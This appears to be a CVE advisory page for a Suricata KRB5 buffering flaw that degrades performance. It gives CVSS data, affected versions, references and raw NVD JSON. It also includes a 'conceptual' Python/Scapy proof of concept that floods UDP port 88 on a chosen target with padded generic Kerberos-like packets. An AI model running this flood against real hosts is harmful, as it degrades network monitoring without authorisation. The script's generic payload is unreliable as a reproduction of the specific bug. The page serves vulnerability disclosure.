CVE-2026-31932

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, inefficiency in KRB5 buffering can lead to performance degradation. This issue has been patched in versions 7.0.15 and 8.0.4.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE

Suricata < 7.0.15

Suricata >= 8.0.0, < 8.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-31932 (Conceptual)
# This script sends crafted KRB5 traffic to test for performance degradation.
# Usage: python3 poc.py <target_ip>

import sys
from scapy.all import IP, UDP, Raw, send

def send_krb5_flood(target_ip):
    # KRB5 typically uses UDP/TCP port 88
    port = 88
    payload = b"\x6e\x81\x81\xaf\x30\x81\xac\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\x0a" # Generic ASN.1 start
    
    print(f"[*] Sending KRB5 packets to {target_ip}...")
    
    for i in range(1000):
        packet = IP(dst=target_ip) / UDP(sport=12345, dport=port) / Raw(load=payload)
        send(packet, verbose=0)
        
        # Add variation to payload if necessary to bypass basic deduplication
        payload += b"\x00"
        
    print("[+] Packets sent. Monitor Suricata CPU usage.")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_ip>")
        sys.exit(1)
    send_krb5_flood(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31932
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31932
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31932/
[4] VulDB https://vuldb.com/cve/CVE-2026-31932
[5] https://github.com/OISF/suricata/security/advisories/GHSA-rp9m-jcpw-hggr
[6] https://redmine.openinfosecfoundation.org/issues/8305

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31932", "sourceIdentifier": "[email protected]", "published": "2026-04-02T14:16:28.763", "lastModified": "2026-04-07T18:29:05.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, inefficiency in KRB5 buffering can lead to performance degradation. This issue has been patched in versions 7.0.15 and 8.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.15", "matchCriteriaId": "1E0D4CF4-11E0-4FB1-9C17-F38257D376ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "F35C5A48-CA30-43B3-9E53-D3E51C862604"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/security/advisories/GHSA-rp9m-jcpw-hggr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://redmine.openinfosecfoundation.org/issues/8305", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}